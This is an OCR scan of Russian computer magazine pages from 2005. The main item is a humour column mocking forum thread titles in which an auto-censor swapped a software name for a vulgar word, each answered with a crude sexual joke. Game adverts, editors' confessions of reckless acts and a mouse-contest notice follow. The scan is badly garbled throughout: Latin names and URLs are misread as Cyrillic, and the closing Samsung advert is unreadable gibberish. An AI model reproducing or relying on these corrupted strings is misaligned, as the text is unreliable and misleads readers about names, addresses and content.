Торможение пенис'а и других диалоговых элементов. 

Вам к урологу. Первая дверь направо. 

Пенис начал пускать только админов. 

Вот он зажрался. Только с админами спит! Надо отучать немед- 
ленно. 

Пенис под пенис — за и против. 

Даешь передастическое голосование! 

Пенис не работает. 

Доигрался, малой. Ну ничего, врачи многое леч ат. 

Пенис просит увеличить размер реестра. 

Он растет, ему виднее. Увеличивай! 

Отключается пенис. 

Что, совсем отключается? К врачу немедленно! Может, от армии 
даже освободит. 

Как отучить метафрейм забивать пенис? 

Да вот странные они люди — эти метафреймы. На все болт заби- 
вают. Налей ему (метафрейму) водки, чтоли. 

Странное поведение пенис'а! 

А в чем оно выражается, это поведение-то? Вопрос не раскрыт. 
Складывается такое ощущение, что если у кого-то поднялся пе- 
нис с ему одному известными параметрами... 

А так иногда и бывает. Если он поднялся, то неизвестно, как пове- 
дет себя его обладатель. 

Скажи, а поднятия пенис'а будет недостаточно? 

Совсем недостаточно. Это и подросток знает. 

Не встает пенис. 

См. предыдущие ответы. 

Нужно ли лицензировать терминал-сервер, если стоит пе- 
нис? 

Если стоит, нужно искать девушку. Или удовлетворить себя 
собственными силами. К черту терминал-сервер. 

У кого на какой операционке пенис стоит? 

У меня стоит на Нпих. Об остальных судить не могу :-). 

Сегодня уже пенис-ой раз регистрируюсь... 

Ничем помочь не могу. Такова жизнь. 

Пенис перестал пускать больше двух клиентов. 

Ну не мучай ты часть тела. Изверг, тебе что, двух партнеров мало? 
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мом деле ссылка проста как мир: ѵѵѵѵѵѵ.репіз.сот. 

Косяков так много в пенис'е. 



Подскажите курсы обучения по пенис. 

Зайди в публичный дом. Там тебя всему на- 
учат! 

Нужен терминальный сервер под пенис. 

А зачем, простите? :-) 

Пенис+пенис = перезагружается пенис. 

Пенис. 

Да не мучай ты его, негодяй! Совсем за- 
таскал бедного. 

Сильная загрузка проца при работе через 
Метафрейм ХР с пенис'ом. 

Про особенности метафреймов я уже го- 
ворил. Так что апгрейд проца тебе помо- 
жет. 

Перешел с пенис на пенис и началось... 

Это смотря как осуществлялся переход. 

Тебе никогда мама не говорила, что делать 
операции в домашних условиях опасно? 

Проблема с пенис'ом. 

Подобные проблемы встречаются у 30% 
всего мужского населения. Так что ты не 
одинок, сынок (утешил, гы-гы :)). 

Зависание пенис'а. 

Если пенис завис, у тебя есть три выхода: 

- Перезагрузиться. 

- Сходить к врачу. 

-Установить свежую версию пениса. 

Совместная жизнь пенис и пенис. 

В принципе, таких, как ты, много. Сексуальных меньшинств в мире — 
пруд-пруди, и это официально не карается. Но писать о подоб- 
ных проблемах в этот форум я бы не стал — засмеют. 

Скачал пенис с ошибкой, помогите! 

И чем мне прикажешь тебе помочь? Перекачай заново, а если и 
тот будет с ошибкой — отпиши поставщику этих ценных органов. 
Он обязательно извинится и предложит нормально функциониру- 
ющую часть тела. 

Мертво зависающий клиентский пенис. 

Какой ты сердобольный. В первую очередь о себе надо заботить- 
ся, а не о клиентах. Ну да ладно, проблемы зависания уже были 
описаны, смотри выше. 

Ищу форумы по пенис. 

Сначала посмотри ѵѵѵѵѵѵ.доу.ги. Там есть свой форум. Если тебе 
не понравится, то поищи на Яндексе другие варианты. 

Как обновить и переустановить пенис? 

Сходить в клинику пластической хирургии. На дому подобные 
операции опасны. 

Клиент пенис'а ругается на лицензии. Большая проблема. 

Да, проблема действительно большая. Но пенис прав, занимать- 
ся этим без лицензии чревато нежелательной беременностью и 
страшными заболеваниями. 

Вот тут говорят, что у пенис'а имеется неплохой встроенный тер- 
минал. Правда ли это? 

Тебе наврали :/. Мать-природа не продумала этот вариант и не 
снабдила орган дополнительными примочками. 

Не удаляется лицензия из пенис'а. 

Не удаляй! Опасно! 

То ли пенис не тянет, то ли руки не из того места растут... 

То ли лыжи не едут, то ли я... <сеп50гесІ> ©. 

Где скачать пенис? 

Я уже говорил про поиск в Яндексе. Не нашел? Ну и дурак. На са- 




Природа несовершенна, друг мой. Косяки есть везде. Кстати, ко- 
сячок не хочешь? 

Падение пенис'а на пенис. 

Какая сентиментальная проблема. Я даже расплакался. А паде- 
ние случилось ДО или ПОСЛЕ? 

Потерялся пенис!!! 

Надо же! А я нашел утром какой-то у себя в сливном бачке. Инте- 
ресно, как он там оказался? Кстати, какое будет вознагражде- 
ние за возвращение твоего друга? 

Зачем нужен пенис? 

Не вгоняй меня в краску! Лучше спроси у своей мамы, почему она 
вовремя не рассказала тебе про чудо-леденец, которым тебя 
создавали. 

Дико тормозит пенис. 

Напиши клиенту, у которого пенис зависает. Возможно, у вас об- 
щая проблема. 

Один пенис в упор не видит другой... 

А ты ему глаза открой. Точнее, глаз... 

Пенис не хочет печатать :(. 

Купи принтер, садист. И впредь используй свои части тела по их 
прямому назначению. 

Как включить суперкэш на пенис? 

Посмотри: там на лицевой стороне есть маленькая кнопочка. 
Нажми на нее. Не включается? Нажми сильнее! 

Кто знает, что такое пенис? 

Я уже рассказывал. Пользуйтесь поиском, благо он есть. 

Подключение к пенис на стороне клиента через прокси. 

Какое извращение, молодой человек. Зачем вам прокси? Лучше 
пользуйтесь лицензиями. 

Пенис не сохраняет пароль. Помогите! 

Так задумано. А вдруг кто-то решит им воспользоваться, пока ты 
спишь? 

Я не тормоз... Я просто не резкий... пенис. 

Я заметил :). 

Книга по пенис'у на халяву... 

Напиши письмо страдающему в пункте 7. Он тебя отблагодарит! 
Не могу изменить данные своего пенис'а. 

Врачи тебе помогут, сынок. Они творят чудеса. 

[пенис... тьфу, эпилог!] Вот, пожалуй, и все. Веришь — нет, но да- 
же сейчас у меня на глаза наворачиваются слезы от смеха. Мо- 
жет быть, после прочтения этой статьи мне кто-нибудь предложит 
работу сексолога-консультанта. И я даже соглашусь! :) 

Кстати, после подобных издевательств над контентом форума мы 
убрали правило автоцензора. Даже написали администратору 
письмо, в котором сообщили суть бага и способы его исправле- 
ния. И правда, зачем портить такой интеллигентный форум? © 






чііиш:ііпі 



СатеРо$1 



Незаменимый 
помощник 
при выборе 
игры 



Описание: 



Продолжение известной АсІіоп/ПРб игры. Раз- 
работкой игры занимается компания Тгоіка 
батез(создателей РаІІоиі и Агсапит). Игра рас 
сказывает о судьбе главного героя - начинаю- 
щего вампира. Жанр игры является смесью 
РР5 и РРѲ, что гарантирует вам возможность 
пострелять из автоматов, огнеметов, снайперс- 
ких винтовок и т.п. 



Ѵатріге: ТЬе Маздиегасіе - ВІоосІІіпез Жанр: 



Яоіе РІауіпд 



Описание: 



Главный герой Зііепі НіІІ 4 оказался заперт в 
собственной квартире. Проведя там довольно 
долгое время, он обнаруживает портал, веду- 
щий в другое измерение - в мир, настолько 
пугающий и враждебный, что не всякий чело- 
век сможет выжить там и не потерять рассу- 
док. Если вы играли в Зііепі НіІІ, вы можете 
представить себе, насколько леденящей кровь 
окажется эта игра. 



к іЩч 



Описание: 



Это онлайновая игра. Игра имеет уникальный 
одноразовый ключ регистрации, который 
можно использовать для создания только 
одного аккоинта доступа, по причине слож- 
ности проверки такого ключа игра не подле- 
жит обмену или возврату. В игру входит один 
бесплатный месяц игры (для его активации 
необходимо ввести номер кредитной карты 
или предоплаченного игрового времени). 



ѴѴогШ о* ѴѴагсгаЙ 
(113 Ѵегзіоп) 



* Огромное 
количество 



* Исчерпывающие * Возможность 
описания посмотреть 

внутренности 

коробок 



скриншотов 



® Тел.: (095)928-0360 
(095) 928-6089 
(095) 928-3574 

шѵт.датеро$(.ги 



Играй 

просто! 




МЫ ОТНЮДЬ НЕ МАЛЬчИКИ-ПАИНЬКИ. Я БЫ 
ДАЖЕ СКАЗАЛ, ЧТО МЫ СОВСЕМ НЕ ПАИНЬ- 
КИ. КАЖДЫЙ ИЗ НАС ПО МОЛОДОСТИ, ДА И 
ДО СИХ ПОР ТВОРИТ КАКИЕ-ТО НЕПОНЯТ- 
НЫЕ ПОСТУПКИ, БЕЗБАШЕННЫЕ ВЕЩИ. ТАК 
ВОТ, ДАВАЙ ЖЕ УЗНАЕМ О НАШИХ РЕДАК- 
ТОРАХ ВСЮ ПРАВДУ И БОЛЬШЕ НЕ БУДЕМ 
ИХ СЧИТАТЬ ПОКЛАДИСТЫМИ КОТЯТАМИ 




[Эг. КІоипіі] Однажды я купался в холер- 
ном водоеме. Зачем? Ну во-первых, я ду- 
мал, что там нашли не холеру, а что-то 
другое. Во-вторых, вроде бы я и не соби- 
рался оттуда пить. Ну а в-третьих, там бы- 
ло мало народу. А еще я любил хими- 
чить классе в восьмом. Поэтому очень 
часто мои штаны были прожжены сер- 
ной кислотой. Сколько я одежды попор- 
тил - ужас просто. В более зрелом воз- 
расте, а именно на практике после 
третьего курса, помню, мы с подружкой очень нескучно проводи- 
ли ночные дежурства. Это был реальный экстрим, хотя, думаю, ник- 
то из хирургов, если бы зашел в открытую сестринскую, нас бы не 
осудил. Правда, было бы немного неудобно :). 



[ЬООМік] А у меня вся жизнь — одно 
сплошное безумие. Я только и делаю, 
что творю безумные и безбашенные ве- 
щи. Обильно натереть лыжи соперника 
парафином перед соревнованиями по 
классическому ходу, хотя за это могут 
очень сильно помять, или стащить у де- 
да-соседа из огорода ванну с после- 
дующей сдачей ее в металлолом и вы- 
ручением средств на гулянки — это 
еще цветочки. Во время лекции на 
третьей парте, прямо перед препода- 
вателем высосать бутылку дешевого портвейна и уйти в абсолют- 
ный ноль — тоже не особая шалость для меня. Самое веселое 
было тогда, когда мы с моим другом Муфлоном, напившись не ху- 
же гиппопотамов (Никитос, привет!), ни с того ни с сего решили 
махнуть в Питер с семью сотнями рублей в кармане на двоих. Че- 
рез час мы уже сидели в поезде и ели роллтон, вежливо выпро- 
шенный у проводника. Очнувшись утром в Питере, мы искренне 
удивились нашему перемещению и ни в какую не хотели верить, 
что мы не в Москве. Что же, пришлось продолжать гиппопотамить- 
ся дальше. Заодно и питерских друзей повидали. А другие исто- 
рии я пока не расскажу. Места мало. 




[СиТТег] Очень постыдный для меня поступок произошел в детстве. 
Я был маленького возраста. Сколько лет мне было тогда, я не пом- 
ню. Но помню, что очень любил играть со своим младшим братом. 
Я часто активно до него докапывался. Обычно это заканчивалось 



его плачем, после чего меня ругали и ста- 
вили в угол. И один раз я опять до него хо- 
рошенько докопался. Все это было в ван- 
ной: братик плескается, я стою рядом и 
от чего-то угораю. В какой-то момент мне 
стало очень смешно. Под эмоциями я ре- 
шил пописать на своего брата. Ну и пи- 
саю, как вдруг часть потока попадает 
брату в рот. От такой неожиданности я 
испугался, а брат заплакал. Сразу при- 
бежали мама с папой. Помню, что в тот 
вечер меня особенно ругали и я дольше обычного стоял в углу. 
Больше я такого не повторял (теперь понятно, почему ты любишь 
мучить животных! — Прим. Бублика.)... 






[ Письмо от: ВазіІ Риркіп <ЗасраІіеи@таіІ.ги> \ 

Преимущества оптики перед механикой: 

1 ) увеличен срок службы; 2) оптику не надо чистить; 3) большая точность 
позиционирования курсора; 4) оптика легче; 5) оптика более неприхотлива 
к рабочей поверхности; 6) не подвержена механическому износу; 

7) оригинальная подсветка основания светодиодом; 8) оптика более чувствительна. 



ВазіІ получает наш 
специальный приз - 
великолепный 
беспроводной 
набор ОеТепбег СагбіпаІ! 

Конкурс, посвященный оптическим мышам и торговой марке Оеіепсіег, продолжается. 
Условия конкурса смотрите в “Хакере” №3 за март 2005 г. Итоги будут опубликованы 
в майском номере журнала. Вы все еще можете выиграть призы от ОеТепбег! 




| Ответ Реіеніег: ^ 



Ура! ВазіІ, ты прислал больше всего вариантов! Поздравляем! Ты стал обладателем 
беспроводного мультимедийного набора с 30 дополнительными клавишами 
и колесом прокрутки. Радуйся! ;) 




Акустическая система 
Оеіепсіег Мегсигу ЗОА 



Проводная клавиатура 
Оеіепсіег Ѵігіиозо 



Проводная оптическая 
мышь Оеіепсіег Рапіега 



Проводная оптическая 
мышь Оеіепсіег М1300 



Проводная оптическая 
мышь Оеіепсіег М1330 





Оптические мыши Оеіепбег от 145 рублей* 
в каждый дом и в каждый офис 



Выиграй ноутбук 
и другие призы 
от Оеіепііег! 





Подробности 
на сайте 

шш.беіепбеші 



Ноутбук 



Цифровые 

фотоаппараты 



Сй/МРЗ плееры 
№ХХ с радио 



* Рекомендованная розничная цена 






ИТ -решения Затзипд для бизнеса 

На оакрніт, па ч-йУМ* Пр-оусгжіпаоіция нампамлг пыб*шп« тЕлиичр йлгпяиад 
IV ін Пй?Г(ХМНИі ыѵ і С€ нп-чій Гфуіі і ѴР»- ПрОДуСТЪі ^п'ііи-чу 

ГНЖОГТЮТ ІРЙІЛВТЬѲІ уетш п. Ы.Ц 4ПИІ пЛК гпсіГаППы-ым ко^рРШУгди, ци 
гі і-юбйпыішіи фнрѵ.^м Рс; і.ч грсч м>хЬй-і і і ь+с- гекноткУ-кн і^гѵзгайусмъм и ншшгсг 
■щртО**вл. печатаны* ^ройетвах ы мониторам гкивдтякн 5аптын*д то древу 
м.і^ллтьцлвітйугіірй ИТ квмглнигы 




Мо-іпчяи і^р 











ГіЛ4р«-Н Б-ІПііи'іП. 1 



. ^Я, МНІ|»ІІЯ. (1 ЕЙ’?, пр- Ь 



И>..^Р«мі_ИОіг 4 кГ і іхг-пр В 500- ХИ 0 400 или* шизь-ьд га Твдлр о#р ч »*фні^-О 0 Ьі 












